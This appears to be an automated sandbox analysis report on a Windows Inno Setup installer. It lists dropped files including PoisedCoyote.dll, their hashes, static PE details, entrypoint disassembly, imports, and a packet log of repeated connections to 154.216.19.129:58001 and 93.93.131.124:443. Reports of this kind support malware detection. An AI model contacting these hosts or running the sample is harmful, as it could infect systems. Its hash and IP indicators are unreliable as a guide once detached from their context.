                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

                                                                  C:\Users\user\AppData\Local\is-DOVSB.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1183089
                                                                  Entropy (8bit):6.3663933835404425
                                                                  Encrypted:false
                                                                  SSDEEP:24576:kYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XN:fGUhni7iSFCQGz
                                                                  MD5:F1ED953D31A56E4899772A56604685B5
                                                                  SHA1:C56DA596FD92B48D2B062C16131A1CFDC984853F
                                                                  SHA-256:438A002FB9CD0BD061345C8F098C69C4249CE0B0D9AC3F1BC5CB3701BA6093EC
                                                                  SHA-512:514131A00232CDE458F50FB8AABEC5D415B62101A814520B8DF7C32AD24C23409C76A64D513B3FD96F526A461DE2531AEAA59A187D647C946DE5B51C52177E8D
                                                                  Malicious:false
                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

                                                                  C:\Users\user\AppData\Local\unins000.dat

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  File Type:InnoSetup Log Little Leg, version 0x418, 3667 bytes, 835180\37\user\376, C:\Users\user\AppData\Local\376\377\377\0
                                                                  Category:dropped
                                                                  Size (bytes):3667
                                                                  Entropy (8bit):3.7596549004290343
                                                                  Encrypted:false
                                                                  SSDEEP:96:RTzG44NWzpZn3ZCdfc1AGlEDA4MZAe2LUHhxo:RTSxYpZ3Ef7fDSmUHXo
                                                                  MD5:4BC88505FFE4E8F89297325C9D2DEEE0
                                                                  SHA1:9CA44B06D9950178AFA4E432626F421A041B683C
                                                                  SHA-256:C42EDF047B7B5D19F804B93ABE1D788C8A11A4427A941809F50CA46BAF22D05A
                                                                  SHA-512:5914A28144F7AC0D94D162D8B53407FFD1B23BBFE3B31D27CB9AF23A7A6B334ACAB9314E150398B22143756EC59996ED9569524BEC7D61F2E531DF34B47C07EC
                                                                  Malicious:false
                                                                  Preview:Inno Setup Uninstall Log (b)....................................Little Leg......................................................................................................................Little Leg..............................................................................................................................S...%...............................................................................................................I_.2....x.............s........8.3.5.1.8.0......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l................:...'.. ..............IFPS...............................................................................................................................................................BOOLEAN..............TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCurrentProcess.......(...dll:kernel32.dll.TerminateProcess................ ...RESTARTINSTALLERWITHSILENTPARAMS....-1..EXPANDCONSTANT........EXEC.........

                                                                  C:\Users\user\AppData\Local\unins000.exe (copy)

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1183089
                                                                  Entropy (8bit):6.3663933835404425
                                                                  Encrypted:false
                                                                  SSDEEP:24576:kYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XN:fGUhni7iSFCQGz
                                                                  MD5:F1ED953D31A56E4899772A56604685B5
                                                                  SHA1:C56DA596FD92B48D2B062C16131A1CFDC984853F
                                                                  SHA-256:438A002FB9CD0BD061345C8F098C69C4249CE0B0D9AC3F1BC5CB3701BA6093EC
                                                                  SHA-512:514131A00232CDE458F50FB8AABEC5D415B62101A814520B8DF7C32AD24C23409C76A64D513B3FD96F526A461DE2531AEAA59A187D647C946DE5B51C52177E8D
                                                                  Malicious:false
                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

                                                                  C:\Users\user\AppData\Roaming\PoisedCoyote.dll (copy)

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2968955
                                                                  Entropy (8bit):7.086805464698464
                                                                  Encrypted:false
                                                                  SSDEEP:49152:ekFE961ytt8iF+L3N4Tefv2HHcRnFuhBRh1l29gDQPpW1ra8h3gA/QMtJhGExB2T:9J1ytt8iF+L3NIcJFuf9SgkpWtv3J2F9
                                                                  MD5:87ABA2697A8DEDA3E1284A79780FF69D
                                                                  SHA1:21DFE5AA0E8F32688FAEE3AC31652392696E0908
                                                                  SHA-256:736AF8F850EBF9FBF744002845787425AA493A5D11202094381051EE66568582
                                                                  SHA-512:3A55DF4BDD9F46126B85484E19BFD53AB8F744B073B1CFE42D9FFEC101947A5A318B16FF7D446FB97834440A1F9D8EC1FFB82D3E67388027E62CAD000CF38616
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....>g....h%....&"...*.,..........0........................................0 .......-...`... .........................................q.................................... .................................(................... ...P............................text...X+.......,..................`..`.data........@.......0..............@....rdata..0H...P...J...4..............@..@.pdata..............~..............@..@.xdata...=...`...>...4..............@..@.bss.....................................edata..q............r..............@..@.idata...........0...t..............@....CRT....`...........................@....tls.......... .....................@....reloc........ .....................@..B........................................................................................................................................................................

                                                                  C:\Users\user\AppData\Roaming\is-D8FFC.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2968955
                                                                  Entropy (8bit):7.086805464698464
                                                                  Encrypted:false
                                                                  SSDEEP:49152:ekFE961ytt8iF+L3N4Tefv2HHcRnFuhBRh1l29gDQPpW1ra8h3gA/QMtJhGExB2T:9J1ytt8iF+L3NIcJFuf9SgkpWtv3J2F9
                                                                  MD5:87ABA2697A8DEDA3E1284A79780FF69D
                                                                  SHA1:21DFE5AA0E8F32688FAEE3AC31652392696E0908
                                                                  SHA-256:736AF8F850EBF9FBF744002845787425AA493A5D11202094381051EE66568582
                                                                  SHA-512:3A55DF4BDD9F46126B85484E19BFD53AB8F744B073B1CFE42D9FFEC101947A5A318B16FF7D446FB97834440A1F9D8EC1FFB82D3E67388027E62CAD000CF38616
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....>g....h%....&"...*.,..........0........................................0 .......-...`... .........................................q.................................... .................................(................... ...P............................text...X+.......,..................`..`.data........@.......0..............@....rdata..0H...P...J...4..............@..@.pdata..............~..............@..@.xdata...=...`...>...4..............@..@.bss.....................................edata..q............r..............@..@.idata...........0...t..............@....CRT....`...........................@....tls.......... .....................@....reloc........ .....................@..B........................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.958379968512178
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  File name:file.exe
                                                                  File size:1'769'630 bytes
                                                                  MD5:fecd099f9b8d9500d7199a1054397e3f
                                                                  SHA1:3df235780c9ad851474c20338e4921f5f2decaf7
                                                                  SHA256:96a60b6cde63794b637bce219083e7905560c626e68c00af1d99be451c8c3700
                                                                  SHA512:e8559b435fc053460cc7d5ba6755c1b8aa659f2bc620bd13f7ac6db7da846088018baf07c630f2fc97769e5da0d0bbc2fcd9b400b7166c6aa5cada4d9a85eca0
                                                                  SSDEEP:49152:zUjKZGiyt7lO9kwWzJLPKeVMFZkYilgWRqadRRnqxD:iflWeOeV8ulCaLc
                                                                  TLSH:9A852303F3C70475FA6855799896D248AD237CB914F6AA3E3CF8EA0F19781C24C76A71
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:2d2e3797b32b2b99

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x416478
                                                                  Entrypoint Section:.itext
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4FC4B854 [Tue May 29 11:51:48 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:483f0c4259a9148c34961abbda6146c1

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  add esp, FFFFFFA4h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  xor eax, eax
                                                                  mov dword ptr [ebp-3Ch], eax
                                                                  mov dword ptr [ebp-40h], eax
                                                                  mov dword ptr [ebp-5Ch], eax
                                                                  mov dword ptr [ebp-30h], eax
                                                                  mov dword ptr [ebp-38h], eax
                                                                  mov dword ptr [ebp-34h], eax
                                                                  mov dword ptr [ebp-2Ch], eax
                                                                  mov dword ptr [ebp-28h], eax
                                                                  mov dword ptr [ebp-14h], eax
                                                                  mov eax, 004152B8h
                                                                  call 00007F1AC0B356A1h
                                                                  xor eax, eax
                                                                  push ebp
                                                                  push 00416B45h
                                                                  push dword ptr fs:[eax]
                                                                  mov dword ptr fs:[eax], esp
                                                                  xor edx, edx
                                                                  push ebp
                                                                  push 00416B01h
                                                                  push dword ptr fs:[edx]
                                                                  mov dword ptr fs:[edx], esp
                                                                  mov eax, dword ptr [0041AB48h]
                                                                  call 00007F1AC0B43F4Bh
                                                                  call 00007F1AC0B43AF2h
                                                                  lea edx, dword ptr [ebp-14h]
                                                                  xor eax, eax
                                                                  call 00007F1AC0B3D774h
                                                                  mov edx, dword ptr [ebp-14h]
                                                                  mov eax, 0041D6E8h
                                                                  call 00007F1AC0B33CD7h
                                                                  push 00000002h
                                                                  push 00000000h
                                                                  push 00000001h
                                                                  mov ecx, dword ptr [0041D6E8h]
                                                                  mov dl, 01h
                                                                  mov eax, dword ptr [0040F080h]
                                                                  call 00007F1AC0B3E05Fh
                                                                  mov dword ptr [0041D6ECh], eax
                                                                  xor edx, edx
                                                                  push ebp
                                                                  push 00416AADh
                                                                  push dword ptr fs:[edx]
                                                                  mov dword ptr fs:[edx], esp
                                                                  call 00007F1AC0B43FD3h
                                                                  mov dword ptr [0041D6F4h], eax
                                                                  mov eax, dword ptr [0041D6F4h]
                                                                  cmp dword ptr [eax+0Ch], 01h
                                                                  jne 00007F1AC0B4533Ah
                                                                  mov eax, dword ptr [0041D6F4h]
                                                                  mov edx, 00000028h
                                                                  call 00007F1AC0B3E528h
                                                                  mov edx, dword ptr [0041D6F4h]

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1e0000xf9e.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000xb1d8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x200000x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1e3500x24c.idata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x143f80x14400c9bb3afc1ceaaa31127ccfa204c657efFalse0.5487316743827161data6.482216817915366IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .itext0x160000xbe80xc001ba5adf2e1058c0460dcc814ba86fb32False0.6246744791666666data6.005798728198158IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .data0x170000xd9c0xe00d5b22eff9e08edaa95f493c1a71158c0False0.2924107142857143data2.669288666959085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .bss0x180000x574c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata0x1e0000xf9e0x1000b47eaca4c149ee829de76a342b5560d5False0.35595703125data4.9677831942996935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls0x1f0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rdata0x200000x180x2003746f5876803f8f30db5bb2deb8772aeFalse0.05078125data0.190488766434666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x210000xb1d80xb20032a01e8a94203e16091013ee86f52f2eFalse0.17913886938202248data4.153057267294984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x2141c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                  RT_ICON0x215440x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                  RT_ICON0x21aac0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                  RT_ICON0x21d940x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                  RT_STRING0x2263c0xc4data0.5969387755102041
                                                                  RT_STRING0x227000xccdata0.6225490196078431
                                                                  RT_STRING0x227cc0x174data0.5510752688172043
                                                                  RT_STRING0x229400x39cdata0.34523809523809523
                                                                  RT_STRING0x22cdc0x34cdata0.4218009478672986
                                                                  RT_STRING0x230280x294data0.4106060606060606
                                                                  RT_RCDATA0x232bc0x82e8dataEnglishUnited States0.11261637622344235
                                                                  RT_RCDATA0x2b5a40x10data1.5
                                                                  RT_RCDATA0x2b5b40x1a0data0.8149038461538461
                                                                  RT_RCDATA0x2b7540x2cdata1.1818181818181819
                                                                  RT_GROUP_ICON0x2b7800x3edataEnglishUnited States0.8387096774193549
                                                                  RT_VERSION0x2b7c00x4b8COM executable for DOSEnglishUnited States0.2806291390728477
                                                                  RT_MANIFEST0x2bc780x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                  Imports

                                                                  DLLImport
                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                  advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                  user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                  kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                  user32.dllCreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
                                                                  kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
                                                                  advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
                                                                  comctl32.dllInitCommonControls
                                                                  kernel32.dllSleep
                                                                  advapi32.dllAdjustTokenPrivileges
                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 21, 2024 02:58:53.491987944 CET4973658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:53.611437082 CET5800149736154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:53.611915112 CET4973658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:53.631356001 CET4973658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:53.750787973 CET5800149736154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:53.751385927 CET4973658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:53.870863914 CET5800149736154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:54.923403025 CET5800149736154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:55.048212051 CET4973658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:55.162770033 CET5800149736154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:55.172928095 CET4973658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:55.292665005 CET5800149736154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:55.292732000 CET4973658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:55.655534029 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:55.655581951 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:55.655699968 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:55.663300037 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:55.663321972 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.100263119 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.100409031 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.105226994 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.105233908 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.105545044 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.149390936 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.191337109 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.602715969 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.602876902 CET4434973893.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.603024960 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.608814001 CET49739443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.608841896 CET4434973993.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.608850002 CET49738443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.608982086 CET49739443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.609165907 CET49739443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.609180927 CET4434973993.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.613323927 CET49739443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:57.655339003 CET4434973993.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:57.736190081 CET4974058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:57.855698109 CET5800149740154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:57.856489897 CET4974058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:57.857064009 CET4974058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:57.976541996 CET5800149740154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:57.976658106 CET4974058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:58.096205950 CET5800149740154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:59.019747972 CET4434973993.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:59.019804955 CET49739443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:59.171506882 CET5800149740154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:59.360703945 CET4974058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:59.405596972 CET5800149740154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:59.406570911 CET4974058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:58:59.411355972 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:59.411374092 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:59.411458969 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:59.411741972 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:58:59.411753893 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:58:59.528224945 CET5800149740154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:58:59.528423071 CET4974058001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:01.084412098 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:59:01.084556103 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:59:01.112126112 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:59:01.112142086 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:59:01.113141060 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:59:01.114226103 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:59:01.159341097 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:59:01.602701902 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:59:01.602803946 CET4434974693.93.131.124192.168.2.4
                                                                  Nov 21, 2024 02:59:01.602952003 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:59:01.603233099 CET49746443192.168.2.493.93.131.124
                                                                  Nov 21, 2024 02:59:01.720567942 CET4975358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:01.840001106 CET5800149753154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:01.840248108 CET4975358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:01.841008902 CET4975358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:01.960427999 CET5800149753154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:01.960494041 CET4975358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:02.079885960 CET5800149753154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:03.243968964 CET5800149753154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:03.244028091 CET4975358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:03.244935036 CET4975358001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:03.361496925 CET4975958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:03.364335060 CET5800149753154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:03.480968952 CET5800149759154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:03.481061935 CET4975958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:03.481695890 CET4975958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:03.601083994 CET5800149759154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:03.601181984 CET4975958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:03.720961094 CET5800149759154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:04.842145920 CET5800149759154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:04.842235088 CET4975958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:04.842401981 CET4975958001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:04.954829931 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:04.961899042 CET5800149759154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:05.074338913 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:05.074462891 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:05.075320959 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:05.194942951 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:05.195116997 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:05.314527035 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.385727882 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.385802031 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.385982037 CET4976258001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.501842976 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.505431890 CET5800149762154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.621381998 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.623919964 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.625190973 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.744824886 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:06.744901896 CET4976658001192.168.2.4154.216.19.129
                                                                  Nov 21, 2024 02:59:06.864439964 CET5800149766154.216.19.129192.168.2.4
                                                                  Nov 21, 2024 02:59:08.024154902 CET5800149766154.216.19.129192.168.2.4
